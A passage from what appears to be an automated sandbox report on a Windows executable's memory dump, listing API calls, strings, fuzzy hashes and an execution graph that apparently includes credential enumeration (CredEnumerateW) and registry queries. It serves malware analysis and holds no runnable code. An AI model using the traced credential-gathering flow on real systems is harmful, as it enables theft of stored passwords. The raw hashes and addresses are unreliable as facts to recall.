                                                                                                                  • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                                  • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                  • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                                  APIs
                                                                                                                  • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _snwprintfmemcpy
                                                                                                                  • String ID: %2.2X
                                                                                                                  • API String ID: 2789212964-323797159
                                                                                                                  • Opcode ID: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                                                  • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                  • Opcode Fuzzy Hash: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                                                  • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _snwprintf
                                                                                                                  • String ID: %%-%d.%ds
                                                                                                                  • API String ID: 3988819677-2008345750
                                                                                                                  • Opcode ID: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                                                  • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                                  • Opcode Fuzzy Hash: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                                                  • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                                  APIs
                                                                                                                  • GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
                                                                                                                  • memset.MSVCRT ref: 00401917
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: PlacementWindowmemset
                                                                                                                  • String ID: WinPos
                                                                                                                  • API String ID: 4036792311-2823255486
                                                                                                                  • Opcode ID: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                                                  • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                  • Opcode Fuzzy Hash: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                                                  • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                  • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                                  • wcscat.MSVCRT ref: 0040DCFF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                  • String ID: _lng.ini
                                                                                                                  • API String ID: 383090722-1948609170
                                                                                                                  • Opcode ID: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                                                  • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                                  • Opcode Fuzzy Hash: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                                                  • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                                  • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                  • API String ID: 2773794195-880857682
                                                                                                                  • Opcode ID: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                                                  • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                                  • Opcode Fuzzy Hash: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                                                  • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                                  APIs
                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                                                                                                  • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: LongWindow
                                                                                                                  • String ID: MZ@
                                                                                                                  • API String ID: 1378638983-2978689999
                                                                                                                  • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                                  • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                                                                                                                  • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                                  • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                                  • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                                  • memset.MSVCRT ref: 0042BAAE
                                                                                                                  • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 438689982-0
                                                                                                                  • Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                                  • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                                  • Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                                  • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@$memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1860491036-0
                                                                                                                  • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                  • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                  • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                  • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                  APIs
                                                                                                                  • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                    • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                    • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                  • free.MSVCRT ref: 0040A908
                                                                                                                  • free.MSVCRT ref: 0040A92B
                                                                                                                  • memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: free$memcpy$mallocwcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 726966127-0
                                                                                                                  • Opcode ID: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                                                                  • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                                  • Opcode Fuzzy Hash: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                                                                  • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                                  APIs
                                                                                                                  • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                  • free.MSVCRT ref: 0040B201
                                                                                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                    • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                    • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                  • free.MSVCRT ref: 0040B224
                                                                                                                  • memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: free$memcpy$mallocwcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 726966127-0
                                                                                                                  • Opcode ID: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                                                                  • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                  • Opcode Fuzzy Hash: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                                                                  • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                  APIs
                                                                                                                  • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                                                                    • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                                                                    • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                                    • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                                                  • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                                                                  • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                                                                  • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcmp$memcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 231171946-0
                                                                                                                  • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                  • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                                  • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                  • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                                  APIs
                                                                                                                  • strlen.MSVCRT ref: 0040B0D8
                                                                                                                  • free.MSVCRT ref: 0040B0FB
                                                                                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                    • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                    • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                  • free.MSVCRT ref: 0040B12C
                                                                                                                  • memcpy.MSVCRT(00000000,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: free$memcpy$mallocstrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3669619086-0
                                                                                                                  • Opcode ID: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                                                                  • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                  • Opcode Fuzzy Hash: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                                                                  • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                  APIs
                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                  • malloc.MSVCRT ref: 00417407
                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                  • free.MSVCRT ref: 00417425
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$freemalloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2605342592-0
                                                                                                                  • Opcode ID: 2d709113fcafe1a04d94ccb325df1834664bd2c227d6907f8f745ae81c56706a
                                                                                                                  • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                  • Opcode Fuzzy Hash: 2d709113fcafe1a04d94ccb325df1834664bd2c227d6907f8f745ae81c56706a
                                                                                                                  • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: wcslen$wcscat$wcscpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1961120804-0
                                                                                                                  • Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                                                  • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                                  • Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                                                  • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:2.4%
                                                                                                                  Dynamic/Decrypted Code Coverage:19.9%
                                                                                                                  Signature Coverage:0.5%
                                                                                                                  Total number of Nodes:870
                                                                                                                  Total number of Limit Nodes:22
API calls 33498->34075 33501 40b136 33512 40c580 28 API calls 33501->33512 33502 40b087 33509 40b0a1 33502->33509 34073 40a699 12 API calls 33502->34073 33503 40b042 33503->33502 33503->33509 34072 40a57c strlen WriteFile 33503->34072 33506 40b0d6 33507 40b116 CloseHandle 33506->33507 33508 40b11f SetCursor 33506->33508 33507->33508 33508->33501 33509->33506 34074 406d77 9 API calls 33509->34074 33511->33339 33512->33343 33525 409a32 33513->33525 33516 409c80 memcpy memcpy 33517 409cda 33516->33517 33517->33516 33518 409d18 ??2@YAPAXI ??2@YAPAXI 33517->33518 33519 408db6 12 API calls 33517->33519 33521 409d54 ??2@YAPAXI 33518->33521 33522 409d8b 33518->33522 33519->33517 33521->33522 33522->33522 33535 409b9c 33522->33535 33524 4023c1 33524->33425 33526 409a44 33525->33526 33527 409a3d ??3@YAXPAX 33525->33527 33528 409a52 33526->33528 33529 409a4b ??3@YAXPAX 33526->33529 33527->33526 33530 409a63 33528->33530 33531 409a5c ??3@YAXPAX 33528->33531 33529->33528 33532 409a83 ??2@YAPAXI ??2@YAPAXI 33530->33532 33533 409a73 ??3@YAXPAX 33530->33533 33534 409a7c ??3@YAXPAX 33530->33534 33531->33530 33532->33516 33533->33534 33534->33532 33536 407a55 free 33535->33536 33537 409ba5 33536->33537 33538 407a55 free 33537->33538 33539 409bad 33538->33539 33540 407a55 free 33539->33540 33541 409bb5 33540->33541 33542 407a55 free 33541->33542 33543 409bbd 33542->33543 33544 407a1f 4 API calls 33543->33544 33545 409bd0 33544->33545 33546 407a1f 4 API calls 33545->33546 33547 409bda 33546->33547 33548 407a1f 4 API calls 33547->33548 33549 409be4 33548->33549 33550 407a1f 4 API calls 33549->33550 33551 409bee 33550->33551 33551->33524 33553 410d0e 2 API calls 33552->33553 33554 410dca 33553->33554 33555 410dfd memset 33554->33555 33594 4070ae 33554->33594 33557 410e1d 33555->33557 33597 410a9c RegOpenKeyExA 33557->33597 33560 401e9e strlen strlen 33560->33428 33560->33429 33561 410e4a 33562 410e7f _mbscpy 33561->33562 33598 410d3d _mbscpy 33561->33598 33562->33560 33564 410e5b 33599 
410add RegQueryValueExA 33564->33599 33566 410e73 RegCloseKey 33566->33562 33567->33432 33568->33438 33600 410a9c RegOpenKeyExA 33569->33600 33571 401c4c 33572 401cad 33571->33572 33601 410add RegQueryValueExA 33571->33601 33572->33441 33572->33442 33574 401c6a 33575 401c71 strchr 33574->33575 33576 401ca4 RegCloseKey 33574->33576 33575->33576 33577 401c85 strchr 33575->33577 33576->33572 33577->33576 33578 401c94 33577->33578 33602 406f06 strlen 33578->33602 33580 401ca1 33580->33576 33581->33444 33582->33429 33583->33435 33584->33461 33605 410a9c RegOpenKeyExA 33585->33605 33587 410b34 33588 410b5d 33587->33588 33606 410add RegQueryValueExA 33587->33606 33588->33461 33590 410b4c RegCloseKey 33590->33588 33592->33461 33593->33449 33595 4070bd GetVersionExA 33594->33595 33596 4070ce 33594->33596 33595->33596 33596->33555 33596->33560 33597->33561 33598->33564 33599->33566 33600->33571 33601->33574 33603 406f17 33602->33603 33604 406f1a memcpy 33602->33604 33603->33604 33604->33580 33605->33587 33606->33590 33608 409b40 33607->33608 33610 409b4e 33607->33610 33615 409901 memset SendMessageA 33608->33615 33611 409b99 33610->33611 33612 409b8b 33610->33612 33611->33473 33616 409868 SendMessageA 33612->33616 33614->33469 33615->33610 33616->33611 33617->33476 33618->33478 33620 404785 FreeLibrary 33619->33620 33621 40473b LoadLibraryA 33620->33621 33622 40474c GetProcAddress 33621->33622 33623 40476e 33621->33623 33622->33623 33624 404764 33622->33624 33625 404781 33623->33625 33626 404785 FreeLibrary 33623->33626 33624->33623 33625->33478 33626->33625 33628 410807 33627->33628 33629 4107fc FreeLibrary 33627->33629 33628->33478 33629->33628 33631 4047a3 33630->33631 33632 404799 FreeLibrary 33630->33632 33631->33478 33632->33631 33634 4107f1 FreeLibrary 33633->33634 33635 403c30 LoadLibraryA 33634->33635 33636 403c74 33635->33636 33637 403c44 GetProcAddress 33635->33637 33639 4107f1 FreeLibrary 33636->33639 33637->33636 33638 403c5e 33637->33638 33638->33636 33642 
403c6b 33638->33642 33640 403c7b 33639->33640 33641 404734 3 API calls 33640->33641 33643 403c86 33641->33643 33642->33640 33710 4036e5 33643->33710 33646 4036e5 27 API calls 33647 403c9a 33646->33647 33648 4036e5 27 API calls 33647->33648 33649 403ca4 33648->33649 33650 4036e5 27 API calls 33649->33650 33651 403cae 33650->33651 33722 4085d2 33651->33722 33659 403ce5 33660 403cf7 33659->33660 33905 402bd1 40 API calls 33659->33905 33770 410a9c RegOpenKeyExA 33660->33770 33663 403d0a 33664 403d1c 33663->33664 33906 402bd1 40 API calls 33663->33906 33771 402c5d 33664->33771 33668 4070ae GetVersionExA 33669 403d31 33668->33669 33789 410a9c RegOpenKeyExA 33669->33789 33671 403d51 33672 403d61 33671->33672 33907 402b22 47 API calls 33671->33907 33790 410a9c RegOpenKeyExA 33672->33790 33675 403d87 33676 403d97 33675->33676 33908 402b22 47 API calls 33675->33908 33791 410a9c RegOpenKeyExA 33676->33791 33679 403dbd 33680 403dcd 33679->33680 33909 402b22 47 API calls 33679->33909 33792 410808 33680->33792 33684 404785 FreeLibrary 33685 403de8 33684->33685 33796 402fdb 33685->33796 33688 402fdb 34 API calls 33689 403e00 33688->33689 33812 4032b7 33689->33812 33698 403e3b 33700 403e73 33698->33700 33701 403e46 _mbscpy 33698->33701 33859 40fb00 33700->33859 33911 40f334 334 API calls 33701->33911 33709->33480 33711 4036fb 33710->33711 33714 4037c5 33710->33714 33912 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33711->33912 33713 40370e 33713->33714 33715 403716 strchr 33713->33715 33714->33646 33715->33714 33716 403730 33715->33716 33913 4021b6 memset 33716->33913 33718 40373f _mbscpy _mbscpy strlen 33719 4037a4 _mbscpy 33718->33719 33720 403789 sprintf 33718->33720 33914 4023e5 16 API calls 33719->33914 33720->33719 33723 4085e2 33722->33723 33915 4082cd 11 API calls 33723->33915 33727 408600 33728 403cba 33727->33728 33729 40860b memset 33727->33729 33740 40821d 33728->33740 33918 410b62 RegEnumKeyExA 33729->33918 33731 408637 33732 4086d2 RegCloseKey 
33731->33732 33734 40865c memset 33731->33734 33919 410a9c RegOpenKeyExA 33731->33919 33922 410b62 RegEnumKeyExA 33731->33922 33732->33728 33920 410add RegQueryValueExA 33734->33920 33737 408694 33921 40848b 10 API calls 33737->33921 33739 4086ab RegCloseKey 33739->33731 33923 410a9c RegOpenKeyExA 33740->33923 33742 40823f 33743 403cc6 33742->33743 33744 408246 memset 33742->33744 33752 4086e0 33743->33752 33924 410b62 RegEnumKeyExA 33744->33924 33746 4082bf RegCloseKey 33746->33743 33748 40826f 33748->33746 33925 410a9c RegOpenKeyExA 33748->33925 33926 4080ed 11 API calls 33748->33926 33927 410b62 RegEnumKeyExA 33748->33927 33751 4082a2 RegCloseKey 33751->33748 33928 4045db 33752->33928 33756 40872d 33758 408737 wcslen 33756->33758 33760 4088ef 33756->33760 33758->33760 33766 40876a 33758->33766 33759 40872b CredEnumerateW 33759->33756 33936 404656 33760->33936 33761 40877a wcsncmp 33761->33766 33763 404734 3 API calls 33763->33766 33764 404785 FreeLibrary 33764->33766 33765 408812 memset 33765->33766 33767 40883c memcpy wcschr 33765->33767 33766->33760 33766->33761 33766->33763 33766->33764 33766->33765 33766->33767 33768 4088c3 LocalFree 33766->33768 33939 40466b _mbscpy 33766->33939 33767->33766 33768->33766 33769 410a9c RegOpenKeyExA 33769->33659 33770->33663 33940 410a9c RegOpenKeyExA 33771->33940 33773 402c7a 33774 402da5 33773->33774 33775 402c87 memset 33773->33775 33774->33668 33941 410b62 RegEnumKeyExA 33775->33941 33777 402d9c RegCloseKey 33777->33774 33778 410b1e 3 API calls 33779 402ce4 memset sprintf 33778->33779 33942 410a9c RegOpenKeyExA 33779->33942 33781 402d28 33782 402d3a sprintf 33781->33782 33943 402bd1 40 API calls 33781->33943 33944 410a9c RegOpenKeyExA 33782->33944 33785 402cb2 33785->33777 33785->33778 33788 402d9a 33785->33788 33945 402bd1 40 API calls 33785->33945 33946 410b62 